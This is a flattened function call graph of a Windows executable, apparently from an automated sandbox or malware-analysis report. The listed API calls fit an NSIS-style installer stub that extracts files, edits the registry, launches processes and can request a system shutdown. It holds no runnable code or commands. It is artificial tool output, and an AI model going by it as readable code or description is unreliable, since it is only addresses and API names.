SendMessageW lstrlenW SendMessageW SendMessageW 4367->4369 4368->4369 4369->4362 4370->4365 4371->4367 4372->4359 4373 4019e4 4374 402bbf 18 API calls 4373->4374 4375 4019eb 4374->4375 4376 402bbf 18 API calls 4375->4376 4377 4019f4 4376->4377 4378 4019fb lstrcmpiW 4377->4378 4379 401a0d lstrcmpW 4377->4379 4380 401a01 4378->4380 4379->4380 4381 4025e5 4382 402ba2 18 API calls 4381->4382 4389 4025f4 4382->4389 4383 40272d 4384 40263a ReadFile 4384->4383 4384->4389 4385 405ddb ReadFile 4385->4389 4386 40267a MultiByteToWideChar 4386->4389 4387 40272f 4403 4060ca wsprintfW 4387->4403 4389->4383 4389->4384 4389->4385 4389->4386 4389->4387 4391 4026a0 SetFilePointer MultiByteToWideChar 4389->4391 4393 402740 4389->4393 4394 405e39 SetFilePointer 4389->4394 4391->4389 4392 402761 SetFilePointer 4392->4383 4393->4383 4393->4392 4395 405e55 4394->4395 4396 405e71 4394->4396 4397 405ddb ReadFile 4395->4397 4396->4389 4398 405e61 4397->4398 4398->4396 4399 405ea2 SetFilePointer 4398->4399 4400 405e7a SetFilePointer 4398->4400 4399->4396 4400->4399 4401 405e85 4400->4401 4402 405e0a WriteFile 4401->4402 4402->4396 4403->4383 3270 401e66 3271 402bbf 18 API calls 3270->3271 3272 401e6c 3271->3272 3273 4052e2 25 API calls 3272->3273 3274 401e76 3273->3274 3288 405863 CreateProcessW 3274->3288 3277 401edb CloseHandle 3280 40281e 3277->3280 3278 401e8c WaitForSingleObject 3279 401e9e 3278->3279 3281 401eb0 GetExitCodeProcess 3279->3281 3291 406595 3279->3291 3283 401ec2 3281->3283 3284 401ecf 3281->3284 3295 4060ca wsprintfW 3283->3295 3284->3277 3285 401ecd 3284->3285 3285->3277 3289 401e7c 3288->3289 3290 405896 CloseHandle 3288->3290 3289->3277 3289->3278 3289->3280 3290->3289 3292 4065b2 PeekMessageW 3291->3292 3293 401ea5 WaitForSingleObject 3292->3293 3294 4065a8 DispatchMessageW 3292->3294 3293->3279 3294->3292 3295->3285 4404 406ae6 4406 4066cb 4404->4406 4405 407036 4406->4405 4407 406755 GlobalAlloc 4406->4407 4408 40674c GlobalFree 4406->4408 4409 4067c3 GlobalFree 4406->4409 4410 4067cc GlobalAlloc 4406->4410 4407->4405 4407->4406 4408->4407 4409->4410 4410->4405 4410->4406 3296 401767 3297 402bbf 18 API calls 3296->3297 3298 40176e 3297->3298 3299 401796 3298->3299 3300 40178e 3298->3300 3354 406183 lstrcpynW 3299->3354 3353 406183 lstrcpynW 3300->3353 3303 401794 3307 406417 5 API calls 3303->3307 3304 4017a1 3355 405b37 lstrlenW CharPrevW 3304->3355 3320 4017b3 3307->3320 3311 4017c5 CompareFileTime 3311->3320 3312 401885 3313 4052e2 25 API calls 3312->3313 3315 40188f 3313->3315 3314 406183 lstrcpynW 3314->3320 3338 4030e7 3315->3338 3316 4052e2 25 API calls 3317 401871 3316->3317 3320->3311 3320->3312 3320->3314 3322 4061a5 18 API calls 3320->3322 3333 40185c 3320->3333 3334 405d33 GetFileAttributesW 3320->3334 3337 405d58 GetFileAttributesW CreateFileW 3320->3337 3358 4064c6 FindFirstFileW 3320->3358 3361 4058c8 3320->3361 3321 4018b6 SetFileTime 3323 4018c8 CloseHandle 3321->3323 3322->3320 3323->3317 3324 4018d9 3323->3324 3325 4018f1 3324->3325 3326 4018de 3324->3326 3327 4061a5 18 API calls 3325->3327 3328 4061a5 18 API calls 3326->3328 3329 4018f9 3327->3329 3331 4018e6 lstrcatW 3328->3331 3332 4058c8 MessageBoxIndirectW 3329->3332 3331->3329 3332->3317 3333->3316 3333->3317 3335 405d52 3334->3335 3336 405d45 SetFileAttributesW 3334->3336 3335->3320 3336->3335 3337->3320 3339 403112 3338->3339 3340 4030f6 SetFilePointer 3338->3340 3365 4031ef GetTickCount 3339->3365 3340->3339 3345 4031ef 43 API calls 3346 403149 3345->3346 3348 4031b5 ReadFile 3346->3348 3351 403158 3346->3351 3352 4018a2 3346->3352 3348->3352 3349 405ddb ReadFile 3349->3351 3351->3349 3351->3352 3380 405e0a WriteFile 3351->3380 3352->3321 3352->3323 3353->3303 3354->3304 3356 405b53 lstrcatW 3355->3356 3357 4017a7 lstrcatW 3355->3357 3356->3357 3357->3303 3359 4064e7 3358->3359 3360 4064dc FindClose 3358->3360 3359->3320 3360->3359 3362 4058dd 3361->3362 3363 405929 3362->3363 3364 4058f1 MessageBoxIndirectW 3362->3364 3363->3320 3364->3363 3366 403347 3365->3366 3367 40321d 3365->3367 3368 402d9f 33 API calls 3366->3368 3382 40336e SetFilePointer 3367->3382 3374 403119 3368->3374 3370 403228 SetFilePointer 3376 40324d 3370->3376 3374->3352 3378 405ddb ReadFile 3374->3378 3375 405e0a WriteFile 3375->3376 3376->3374 3376->3375 3377 403328 SetFilePointer 3376->3377 3383 403358 3376->3383 3386 406698 3376->3386 3393 402d9f 3376->3393 3377->3366 3379 403132 3378->3379 3379->3345 3379->3352 3381 405e28 3380->3381 3381->3351 3382->3370 3384 405ddb ReadFile 3383->3384 3385 40336b 3384->3385 3385->3376 3387 4066bd 3386->3387 3388 4066c5 3386->3388 3387->3376 3388->3387 3389 406755 GlobalAlloc 3388->3389 3390 40674c GlobalFree 3388->3390 3391 4067c3 GlobalFree 3388->3391 3392 4067cc GlobalAlloc 3388->3392 3389->3387 3389->3388 3390->3389 3391->3392 3392->3387 3392->3388 3394 402db0 3393->3394 3395 402dc8 3393->3395 3396 402dc0 3394->3396 3397 402db9 DestroyWindow 3394->3397 3398 402dd0 3395->3398 3399 402dd8 GetTickCount 3395->3399 3396->3376 3397->3396 3400 406595 2 API calls 3398->3400 3399->3396 3401 402de6 3399->3401 3400->3396 3402 402e1b CreateDialogParamW ShowWindow 3401->3402 3403 402dee 3401->3403 3402->3396 3403->3396 3408 402d83 3403->3408 3405 402dfc wsprintfW 3406 4052e2 25 API calls 3405->3406 3407 402e19 3406->3407 3407->3396 3409 402d92 3408->3409 3410 402d94 MulDiv 3408->3410 3409->3410 3410->3405 4411 401ee9 4412 402bbf 18 API calls 4411->4412 4413 401ef0 4412->4413 4414 4064c6 2 API calls 4413->4414 4415 401ef6 4414->4415 4417 401f07 4415->4417 4418 4060ca wsprintfW 4415->4418 4418->4417 3423 4021ea 3424 402bbf 18 API calls 3423->3424 3425 4021f0 3424->3425 3426 402bbf 18 API calls 3425->3426 3427 4021f9 3426->3427 3428 402bbf 18 API calls 3427->3428 3429 402202 3428->3429 3430 4064c6 2 API calls 3429->3430 3431 40220b 3430->3431 3432 40221c lstrlenW lstrlenW 3431->3432 3433 40220f 3431->3433 3435 4052e2 25 API calls 3432->3435 3434 4052e2 25 API calls 3433->3434 3437 402217 3433->3437 3434->3437 3436 40225a SHFileOperationW 3435->3436 3436->3433 3436->3437 4419 40156b 4420 401584 4419->4420 4421 40157b ShowWindow 4419->4421 4422 401592 ShowWindow 4420->4422 4423 402a4c 4420->4423 4421->4420 4422->4423 4424 40226e 4425 402275 4424->4425 4428 402288 4424->4428 4426 4061a5 18 API calls 4425->4426 4427 402282 4426->4427 4429 4058c8 MessageBoxIndirectW 4427->4429 4429->4428 3457 403d6f 3458 403ec2 3457->3458 3459 403d87 3457->3459 3461 403ed3 GetDlgItem GetDlgItem 3458->3461 3470 403f13 3458->3470 3459->3458 3460 403d93 3459->3460 3462 403db1 3460->3462 3463 403d9e SetWindowPos 3460->3463 3464 404247 19 API calls 3461->3464 3467 403db6 ShowWindow 3462->3467 3468 403dce 3462->3468 3463->3462 3469 403efd SetClassLongW 3464->3469 3465 403f6d 3466 404293 SendMessageW 3465->3466 3475 403ebd 3465->3475 3517 403f7f 3466->3517 3467->3468 3471 403df0 3468->3471 3472 403dd6 DestroyWindow 3468->3472 3473 40140b 2 API calls 3469->3473 3470->3465 3474 401389 2 API calls 3470->3474 3477 403df5 SetWindowLongW 3471->3477 3478 403e06 3471->3478 3476 4041d0 3472->3476 3473->3470 3479 403f45 3474->3479 3476->3475 3486 404201 ShowWindow 3476->3486 3477->3475 3482 403e12 GetDlgItem 3478->3482 3483 403eaf 3478->3483 3479->3465 3484 403f49 SendMessageW 3479->3484 3480 40140b 2 API calls 3480->3517 3481 4041d2 DestroyWindow EndDialog 3481->3476 3487 403e42 3482->3487 3488 403e25 SendMessageW IsWindowEnabled 3482->3488 3485 4042ae 8 API calls 3483->3485 3484->3475 3485->3475 3486->3475 3490 403e4f 3487->3490 3491 403e96 SendMessageW 3487->3491 3492 403e62 3487->3492 3500 403e47 3487->3500 3488->3475 3488->3487 3489 4061a5 18 API calls 3489->3517 3490->3491 3490->3500 3491->3483 3495 403e6a 3492->3495 3496 403e7f 3492->3496 3493 404220 SendMessageW 3497 403e7d 3493->3497 3494 404247 19 API calls 3494->3517 3530 40140b 3495->3530 3499 40140b 2 API calls 3496->3499 3497->3483 3501 403e86 3499->3501 3500->3493 3501->3483 3501->3500 3502 404247 19 API calls 3503 403ffa GetDlgItem 3502->3503 3504 404017 ShowWindow KiUserCallbackDispatcher 3503->3504 3505 40400f 3503->3505 3527 404269 KiUserCallbackDispatcher 3504->3527 3505->3504 3507 404041 EnableWindow 3510 404055 3507->3510 3508 40405a GetSystemMenu EnableMenuItem SendMessageW 3509 40408a SendMessageW 3508->3509 3508->3510 3509->3510 3510->3508 3528 40427c SendMessageW 3510->3528 3529 406183 lstrcpynW 3510->3529 3513 4040b8 lstrlenW 3514 4061a5 18 API calls 3513->3514 3515 4040ce SetWindowTextW 3514->3515 3516 401389 2 API calls 3515->3516 3516->3517 3517->3475 3517->3480 3517->3481 3517->3489 3517->3494 3517->3502 3518 404112 DestroyWindow 3517->3518 3518->3476 3519 40412c CreateDialogParamW 3518->3519 3519->3476 3520 40415f 3519->3520 3521 404247 19 API calls 3520->3521 3522 40416a GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3521->3522 3523 401389 2 API calls 3522->3523 3524 4041b0 3523->3524 3524->3475 3525 4041b8 ShowWindow 3524->3525 3526 404293 SendMessageW 3525->3526 3526->3476 3527->3507 3528->3510 3529->3513 3531 401389 2 API calls 3530->3531 3532 401420 3531->3532 3532->3500 4430 4014f1 SetForegroundWindow 4431 402a4c 4430->4431 4432 401673 4433 402bbf 18 API calls 4432->4433 4434 40167a 4433->4434 4435 402bbf 18 API calls 4434->4435 4436 401683 4435->4436 4437 402bbf 18 API calls 4436->4437 4438 40168c MoveFileW 4437->4438 4439 40169f 4438->4439 4445 401698 4438->4445 4440 4064c6 2 API calls 4439->4440 4443 4021e1 4439->4443 4442 4016ae 4440->4442 4441 401423 25 API calls 4441->4443 4442->4443 4444 406024 38 API calls 4442->4444 4444->4445 4445->4441 4446 401cfa GetDlgItem GetClientRect 4447 402bbf 18 API calls 4446->4447 4448 401d2c LoadImageW SendMessageW 4447->4448 4449 401d4a DeleteObject 4448->4449 4450 402a4c 4448->4450 4449->4450 3942 4027fb 3943 402bbf 18 API calls 3942->3943 3944 402802 FindFirstFileW 3943->3944 3945 40282a 3944->3945 3949 402815 3944->3949 3946 402833 3945->3946 3950 4060ca wsprintfW 3945->3950 3951 406183 lstrcpynW 3946->3951 3950->3946 3951->3949 3952 40237b 3953 402381 3952->3953 3954 402bbf 18 API calls 3953->3954 3955 402393 3954->3955 3956 402bbf 18 API calls 3955->3956 3957 40239d RegCreateKeyExW 3956->3957 3958 4023c7 3957->3958 3959 402a4c 3957->3959 3960 4023e2 3958->3960 3961 402bbf 18 API calls 3958->3961 3965 4023ee 3960->3965 3969 402ba2 3960->3969 3962 4023d8 lstrlenW 3961->3962 3962->3960 3964 402409 RegSetValueExW 3967 40241f RegCloseKey 3964->3967 3965->3964 3966 4030e7 45 API calls 3965->3966 3966->3964 3967->3959 3970 4061a5 18 API calls 3969->3970 3971 402bb6 3970->3971 3971->3965 4465 4014ff 4466 401507 4465->4466 4468 40151a 4465->4468 4467 402ba2 18 API calls 4466->4467 4467->4468 4469 401000 4470 401037 BeginPaint GetClientRect 4469->4470 4471 40100c DefWindowProcW 4469->4471 4473 4010f3 4470->4473 4474 401179 4471->4474 4475 401073 CreateBrushIndirect FillRect DeleteObject 4473->4475 4476 4010fc 4473->4476 4475->4473 4477 401102 CreateFontIndirectW 4476->4477 4478 401167 EndPaint 4476->4478 4477->4478 4479 401112 6 API calls 4477->4479 4478->4474 4479->4478 4480 401904 4481 40193b 4480->4481 4482 402bbf 18 API calls 4481->4482 4483 401940 4482->4483 4484 405974 69 API calls 4483->4484 4485 401949 4484->4485 4486 402d04 4487 402d16 SetTimer 4486->4487 4488 402d2f 4486->4488 4487->4488 4489 402d7d 4488->4489 4490 402d83 MulDiv 4488->4490 4491 402d3d wsprintfW SetWindowTextW SetDlgItemTextW 4490->4491 4491->4489 4500 402786 4501 40278d 4500->4501 4503 4029f7 4500->4503 4502 402ba2 18 API calls 4501->4502 4504 402798 4502->4504 4505 40279f SetFilePointer 4504->4505 4505->4503 4506 4027af 4505->4506 4508 4060ca wsprintfW 4506->4508 4508->4503 4509 401907 4510 402bbf 18 API calls 4509->4510 4511 40190e 4510->4511 4512 4058c8 MessageBoxIndirectW 4511->4512 4513 401917 4512->4513 3411 401e08 3412 402bbf 18 API calls 3411->3412 3413 401e0e 3412->3413 3414 402bbf 18 API calls 3413->3414 3415 401e17 3414->3415 3416 402bbf 18 API calls 3415->3416 3417 401e20 3416->3417 3418 402bbf 18 API calls 3417->3418 3419 401e29 3418->3419 3420 401423 25 API calls 3419->3420 3421 401e30 ShellExecuteW 3420->3421 3422 401e61 3421->3422 4519 40398a 4520 403995 4519->4520 4521 40399c GlobalAlloc 4520->4521 4522 403999 4520->4522 4521->4522 4523 401491 4524 4052e2 25 API calls 4523->4524 4525 401498 4524->4525 3543 402095 3544 402bbf 18 API calls 3543->3544 3545 40209c 3544->3545 3546 402bbf 18 API calls 3545->3546 3547 4020a6 3546->3547 3548 402bbf 18 API calls 3547->3548 3549 4020b0 3548->3549 3550 402bbf 18 API calls 3549->3550 3551 4020ba 3550->3551 3552 402bbf 18 API calls 3551->3552 3554 4020c4 3552->3554 3553 402103 CoCreateInstance 3558 402122 3553->3558 3554->3553 3555 402bbf 18 API calls 3554->3555 3555->3553 3556 401423 25 API calls 3557 4021e1 3556->3557 3558->3556 3558->3557 4533 401a15 4534 402bbf 18 API calls 4533->4534 4535 401a1e ExpandEnvironmentStringsW 4534->4535 4536 401a32 4535->4536 4538 401a45 4535->4538 4537 401a37 lstrcmpW 4536->4537 4536->4538 4537->4538 4539 402515 4540 402bbf 18 API calls 4539->4540 4541 40251c 4540->4541 4544 405d58 GetFileAttributesW CreateFileW 4541->4544 4543 402528 4544->4543 4545 404395 lstrlenW 4546 4043b4 4545->4546 4547 4043b6 WideCharToMultiByte 4545->4547 4546->4547 4548 401b16 4549 402bbf 18 API calls 4548->4549 4550 401b1d 4549->4550 4551 402ba2 18 API calls 4550->4551 4552 401b26 wsprintfW 4551->4552 4553 402a4c 4552->4553 4554 40469b 4555 4046d1 4554->4555 4556 4046ab 4554->4556 4558 4042ae 8 API calls 4555->4558 4557 404247 19 API calls 4556->4557 4559 4046b8 SetDlgItemTextW 4557->4559 4560 4046dd 4558->4560 4559->4555 4561 40159b 4562 402bbf 18 API calls 4561->4562 4563 4015a2 SetFileAttributesW 4562->4563 4564 4015b4 4563->4564 3980 40229d 3981 4022a5 3980->3981 3982 4022ab 3980->3982 3984 402bbf 18 API calls 3981->3984 3983 4022b9 3982->3983 3985 402bbf 18 API calls 3982->3985 3986 4022c7 3983->3986 3987 402bbf 18 API calls 3983->3987 3984->3982 3985->3983 3988 402bbf 18 API calls 3986->3988 3987->3986 3989 4022d0 WritePrivateProfileStringW 3988->3989 4565 401f1d 4566 402bbf 18 API calls 4565->4566 4567 401f24 4566->4567 4568 406559 5 API calls 4567->4568 4569 401f33 4568->4569 4570 401fb7 4569->4570 4571 401f4f GlobalAlloc 4569->4571 4571->4570 4572 401f63 4571->4572 4573 406559 5 API calls 4572->4573 4574 401f6a 4573->4574 4575 406559 5 API calls 4574->4575 4576 401f74 4575->4576 4576->4570 4580 4060ca wsprintfW 4576->4580 4578 401fa9 4581 4060ca wsprintfW 4578->4581 4580->4578 4581->4570 3990 40249e 3991 402cc9 19 API calls 3990->3991 3992 4024a8 3991->3992 3993 402ba2 18 API calls 3992->3993 3994 4024b1 3993->3994 3995 4024bc 3994->3995 3999 40281e 3994->3999 3996 4024d5 RegEnumValueW 3995->3996 3997 4024c9 RegEnumKeyW 3995->3997 3998 4024ee RegCloseKey 3996->3998 3996->3999 3997->3998 3998->3999 4582 40149e 4583 4014ac PostQuitMessage 4582->4583 4584 402288 4582->4584 4583->4584 4001 40231f 4002 402324 4001->4002 4003 40234f 4001->4003 4004 402cc9 19 API calls 4002->4004 4005 402bbf 18 API calls 4003->4005 4006 40232b 4004->4006 4007 402356 4005->4007 4008 402335 4006->4008 4012 40236c 4006->4012 4013 402bff RegOpenKeyExW 4007->4013 4009 402bbf 18 API calls 4008->4009 4010 40233c RegDeleteValueW RegCloseKey 4009->4010 4010->4012 4014 402c93 4013->4014 4015 402c2a 4013->4015 4014->4012 4016 402c50 RegEnumKeyW 4015->4016 4017 402c62 RegCloseKey 4015->4017 4019 402c87 RegCloseKey 4015->4019 4022 402bff 5 API calls 4015->4022 4016->4015 4016->4017 4018 406559 5 API calls 4017->4018 4020 402c72 4018->4020 4021 402c76 4019->4021 4020->4021 4023 402ca2 RegDeleteKeyW 4020->4023 4021->4014 4022->4015 4023->4021 3106 405421 3107 405442 GetDlgItem GetDlgItem GetDlgItem 3106->3107 3108 4055cb 3106->3108 3151 40427c SendMessageW 3107->3151 3110 4055d4 GetDlgItem CreateThread CloseHandle 3108->3110 3111 4055fc 3108->3111 3110->3111 3224 4053b5 OleInitialize 3110->3224 3113 405613 ShowWindow ShowWindow 3111->3113 3114 40564c 3111->3114 3115 405627 3111->3115 3112 4054b2 3118 4054b9 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3112->3118 3156 40427c SendMessageW 3113->3156 3160 4042ae 3114->3160 3116 405687 3115->3116 3120 405661 ShowWindow 3115->3120 3121 40563b 3115->3121 3116->3114 3127 405695 SendMessageW 3116->3127 3125 405527 3118->3125 3126 40550b SendMessageW SendMessageW 3118->3126 3123 405681 3120->3123 3124 405673 3120->3124 3157 404220 3121->3157 3122 40565a 3130 404220 SendMessageW 3123->3130 3174 4052e2 3124->3174 3131 40553a 3125->3131 3132 40552c SendMessageW 3125->3132 3126->3125 3127->3122 3133 4056ae CreatePopupMenu 3127->3133 3130->3116 3152 404247 3131->3152 3132->3131 3185 4061a5 3133->3185 3137 40554a 3140 405553 ShowWindow 3137->3140 3141 405587 GetDlgItem SendMessageW 3137->3141 3138 4056db GetWindowRect 3139 4056ee TrackPopupMenu 3138->3139 3139->3122 3142 405709 3139->3142 3143 405576 3140->3143 3144 405569 ShowWindow 3140->3144 3141->3122 3145 4055ae SendMessageW SendMessageW 3141->3145 3146 405725 SendMessageW 3142->3146 3155 40427c SendMessageW 3143->3155 3144->3143 3145->3122 3146->3146 3147 405742 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3146->3147 3149 405767 SendMessageW 3147->3149 3149->3149 3150 405790 GlobalUnlock SetClipboardData CloseClipboard 3149->3150 3150->3122 3151->3112 3153 4061a5 18 API calls 3152->3153 3154 404252 SetDlgItemTextW 3153->3154 3154->3137 3155->3141 3156->3115 3158 404227 3157->3158 3159 40422d SendMessageW 3157->3159 3158->3159 3159->3114 3161 4042c6 GetWindowLongW 3160->3161 3162 40434f 3160->3162 3161->3162 3163 4042d7 3161->3163 3162->3122 3164 4042e6 GetSysColor 3163->3164 3165 4042e9 3163->3165 3164->3165 3166 4042f9 SetBkMode 3165->3166 3167 4042ef SetTextColor 3165->3167 3168 404311 GetSysColor 3166->3168 3169 404317 3166->3169 3167->3166 3168->3169 3170 404328 3169->3170 3171 40431e SetBkColor 3169->3171 3170->3162 3172 404342 CreateBrushIndirect 3170->3172 3173 40433b DeleteObject 3170->3173 3171->3170 3172->3162 3173->3172 3175 4052fd 3174->3175 3176 40539f 3174->3176 3177 405319 lstrlenW 3175->3177 3178 4061a5 18 API calls 3175->3178 3176->3123 3179 405342 3177->3179 3180 405327 lstrlenW 3177->3180 3178->3177 3182 405355 3179->3182 3183 405348 SetWindowTextW 3179->3183 3180->3176 3181 405339 lstrcatW 3180->3181 3181->3179 3182->3176 3184 40535b SendMessageW SendMessageW SendMessageW 3182->3184 3183->3182 3184->3176 3190 4061b2 3185->3190 3186 4063fd 3187 4056be AppendMenuW 3186->3187 3219 406183 lstrcpynW 3186->3219 3187->3138 3187->3139 3189 406265 GetVersion 3189->3190 3190->3186 3190->3189 3191 4063cb lstrlenW 3190->3191 3194 4061a5 10 API calls 3190->3194 3196 4062e0 GetSystemDirectoryW 3190->3196 3197 4062f3 GetWindowsDirectoryW 3190->3197 3199 406327 SHGetSpecialFolderLocation 3190->3199 3200 4061a5 10 API calls 3190->3200 3201 40636c lstrcatW 3190->3201 3203 406050 RegOpenKeyExW 3190->3203 3208 406417 3190->3208 3217 4060ca wsprintfW 3190->3217 3218 406183 lstrcpynW 3190->3218 3191->3190 3194->3191 3196->3190 3197->3190 3199->3190 3202 40633f SHGetPathFromIDListW CoTaskMemFree 3199->3202 3200->3190 3201->3190 3202->3190 3204 4060c4 3203->3204 3205 406084 RegQueryValueExW 3203->3205 3204->3190 3206 4060a5 RegCloseKey 3205->3206 3206->3204 3215 406424 3208->3215 3209 40649a 3210 40649f CharPrevW 3209->3210 3212 4064c0 3209->3212 3210->3209 3211 40648d CharNextW 3211->3209 3211->3215 3212->3190 3214 406479 CharNextW 3214->3215 3215->3209 3215->3211 3215->3214 3216 406488 CharNextW 3215->3216 3220 405b64 3215->3220 3216->3211 3217->3190 3218->3190 3219->3187 3221 405b6a 3220->3221 3222 405b80 3221->3222 3223 405b71 CharNextW 3221->3223 3222->3215 3223->3221 3231 404293 3224->3231 3226 404293 SendMessageW 3227 405411 OleUninitialize 3226->3227 3228 4053d8 3230 4053ff 3228->3230 3234 401389 3228->3234 3230->3226 3232 4042ab 3231->3232 3233 40429c SendMessageW 3231->3233 3232->3228 3233->3232 3236 401390 3234->3236 3235 4013fe 3235->3228 3236->3235 3237 4013cb MulDiv SendMessageW 3236->3237 3237->3236 4585 401ca3 4586 402ba2 18 API calls 4585->4586 4587 401ca9 IsWindow 4586->4587 4588 401a05 4587->4588 4589 402a27 SendMessageW 4590 402a41 InvalidateRect 4589->4590 4591 402a4c 4589->4591 4590->4591 3438 40242a 3449 402cc9 3438->3449 3440 402434 3441 402bbf 18 API calls 3440->3441 3442 40243d 3441->3442 3443 402448 RegQueryValueExW 3442->3443 3446 40281e 3442->3446 3444 402468 3443->3444 3445 40246e RegCloseKey 3443->3445 3444->3445 3453 4060ca wsprintfW 3444->3453 3445->3446 3450 402bbf 18 API calls 3449->3450 3451 402ce2 3450->3451 3452 402cf0 RegOpenKeyExW 3451->3452 3452->3440 3453->3445 4599 40172d 4600 402bbf 18 API calls 4599->4600 4601 401734 SearchPathW 4600->4601 4602 40174f 4601->4602 4603 4027b4 4604 4027ba 4603->4604 4605 4027c2 FindClose 4604->4605 4606 402a4c 4604->4606 4605->4606 3559 4033b6 SetErrorMode GetVersion 3560 4033ea 3559->3560 3561 4033f0 3559->3561 3562 406559 5 API calls 3560->3562 3650 4064ed GetSystemDirectoryW 3561->3650 3562->3561 3564 403407 3565 4064ed 3 API calls 3564->3565 3566 403411 3565->3566 3567 4064ed 3 API calls 3566->3567 3568 40341b 3567->3568 3653 406559 GetModuleHandleA 3568->3653 3571 406559 5 API calls 3572 403429 #17 OleInitialize SHGetFileInfoW 3571->3572 3659 406183 lstrcpynW 3572->3659 3574 403466 GetCommandLineW 3660 406183 lstrcpynW 3574->3660 3576 403478 GetModuleHandleW 3577 403490 3576->3577 3578 405b64 CharNextW 3577->3578 3579 40349f CharNextW 3578->3579 3580 4035ca GetTempPathW 3579->3580 3587 4034b8 3579->3587 3661 403385 3580->3661 3582 4035e2 3583 4035e6 GetWindowsDirectoryW lstrcatW 3582->3583 3584 40363c DeleteFileW 3582->3584 3588 403385 12 API calls 3583->3588 3671 402e41 GetTickCount GetModuleFileNameW 3584->3671 3585 405b64 CharNextW 3585->3587 3587->3585 3593 4035b5 3587->3593 3595 4035b3 3587->3595 3590 403602 3588->3590 3589 403650 3591 403703 3589->3591 3596 4036f3 3589->3596 3600 405b64 CharNextW 3589->3600 3590->3584 3592 403606 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3590->3592 3774 4038da 3591->3774 3594 403385 12 API calls 3592->3594 3757 406183 lstrcpynW 3593->3757 3598 403634 3594->3598 3595->3580 3701 4039cc 3596->3701 3598->3584 3598->3591 3617 40366f 3600->3617 3603 40383e 3605 4038c2 ExitProcess 3603->3605 3606 403846 GetCurrentProcess OpenProcessToken 3603->3606 3604 40371e 3607 4058c8 MessageBoxIndirectW 3604->3607 3608 403892 3606->3608 3609 40385e LookupPrivilegeValueW AdjustTokenPrivileges 3606->3609 3613 40372c ExitProcess 3607->3613 3616 406559 5 API calls 3608->3616 3609->3608 3611 403734 3783 40584b 3611->3783 3612 4036cd 3758 405c3f 3612->3758 3620 403899 3616->3620 3617->3611 3617->3612 3623 4038ae ExitWindowsEx 3620->3623 3626 4038bb 3620->3626 3621 403755 lstrcatW lstrcmpiW 3621->3591 3625 403771 3621->3625 3622 40374a lstrcatW 3622->3621 3623->3605 3623->3626 3628 403776 3625->3628 3629 40377d 3625->3629 3630 40140b 2 API calls 3626->3630 3627 4036e8 3773 406183 lstrcpynW 3627->3773 3786 4057b1 CreateDirectoryW 3628->3786 3791 40582e CreateDirectoryW 3629->3791 3630->3605 3635 403782 SetCurrentDirectoryW 3636 403792 3635->3636 3637 40379d 3635->3637 3794 406183 lstrcpynW 3636->3794 3795 406183 lstrcpynW 3637->3795 3640 4061a5 18 API calls 3641 4037dc DeleteFileW 3640->3641 3642 4037e9 CopyFileW 3641->3642 3647 4037ab 3641->3647 3642->3647 3643 403832 3645 406024 38 API calls 3643->3645 3645->3591 3646 4061a5 18 API calls 3646->3647 3647->3640 3647->3643 3647->3646 3648 405863 2 API calls 3647->3648 3649 40381d CloseHandle 3647->3649 3796 406024 MoveFileExW 3647->3796 3648->3647 3649->3647 3651 40650f wsprintfW LoadLibraryW 3650->3651 3651->3564 3654 406575 3653->3654 3655 40657f GetProcAddress 3653->3655 3656 4064ed 3 API calls 3654->3656 3657 403422 3655->3657 3658 40657b 3656->3658 3657->3571 3658->3655 3658->3657 3659->3574 3660->3576 3662 406417 5 API calls 3661->3662 3663 403391 3662->3663 3664 40339b 3663->3664 3665 405b37 3 API calls 3663->3665 3664->3582 3666 4033a3 3665->3666 3667 40582e 2 API calls 3666->3667 3668 4033a9 3667->3668 3669 405d87 2 API calls 3668->3669 3670 4033b4 3669->3670 3670->3582 3800 405d58 GetFileAttributesW CreateFileW 3671->3800 3673 402e84 3700 402e91 3673->3700 3801 406183 lstrcpynW 3673->3801 3675 402ea7 3802 405b83 lstrlenW 3675->3802 3679 402eb8 GetFileSize 3680 402fb9 3679->3680 3698 402ecf 3679->3698 3681 402d9f 33 API calls 3680->3681 3683 402fc0 3681->3683 3682 403358 ReadFile 3682->3698 3685 402ffc GlobalAlloc 3683->3685 3683->3700 3808 40336e SetFilePointer 3683->3808 3684 403054 3687 402d9f 33 API calls 3684->3687 3686 403013 3685->3686 3692 405d87 2 API calls 3686->3692 3687->3700 3689 402fdd 3690 403358 ReadFile 3689->3690 3693 402fe8 3690->3693 3691 402d9f 33 API calls 3691->3698 3694 403024 CreateFileW 3692->3694 3693->3685 3693->3700 3695 40305e 3694->3695 3694->3700 3807 40336e SetFilePointer 3695->3807 3697 40306c 3699 4030e7 45 API calls 3697->3699 3698->3680 3698->3682 3698->3684 3698->3691 3698->3700 3699->3700 3700->3589 3702 406559 5 API calls 3701->3702 3703 4039e0 3702->3703 3704 4039e6 3703->3704 3705 4039f8 3703->3705 3818 4060ca wsprintfW 3704->3818 3706 406050 3 API calls 3705->3706 3707 403a28 3706->3707 3709 403a47 lstrcatW 3707->3709 3711 406050 3 API calls 3707->3711 3710 4039f6 3709->3710 3809 403ca2 3710->3809 3711->3709 3714 405c3f 18 API calls 3715 403a79 3714->3715 3716 403b0d 3715->3716 3718 406050 3 API calls 3715->3718 3717 405c3f 18 API calls 3716->3717 3719 403b13 3717->3719 3725 403aab 3718->3725 3720 403b23 LoadImageW 3719->3720 3721 4061a5 18 API calls 3719->3721 3722 403bc9 3720->3722 3723 403b4a RegisterClassW 3720->3723 3721->3720 3727 40140b 2 API calls 3722->3727 3726 403b80 SystemParametersInfoW CreateWindowExW 3723->3726 3756 403bd3 3723->3756 3724 403acc lstrlenW 3729 403b00 3724->3729 3730 403ada lstrcmpiW 3724->3730 3725->3716 3725->3724 3728 405b64 CharNextW 3725->3728 3726->3722 3731 403bcf 3727->3731 3732 403ac9 3728->3732 3734 405b37 3 API calls 3729->3734 3730->3729 3733 403aea GetFileAttributesW 3730->3733 3737 403ca2 19 API calls 3731->3737 3731->3756 3732->3724 3736 403af6 3733->3736 3735 403b06 3734->3735 3819 406183 lstrcpynW 3735->3819 3736->3729 3740 405b83 2 API calls 3736->3740 3738 403be0 3737->3738 3741 403bec ShowWindow 3738->3741 3742 403c6f 3738->3742 3740->3729 3743 4064ed 3 API calls 3741->3743 3744 4053b5 5 API calls 3742->3744 3745 403c04 3743->3745 3746 403c75 3744->3746 3749 403c12 GetClassInfoW 3745->3749 3751 4064ed 3 API calls 3745->3751 3747 403c91 3746->3747 3748 403c79 3746->3748 3750 40140b 2 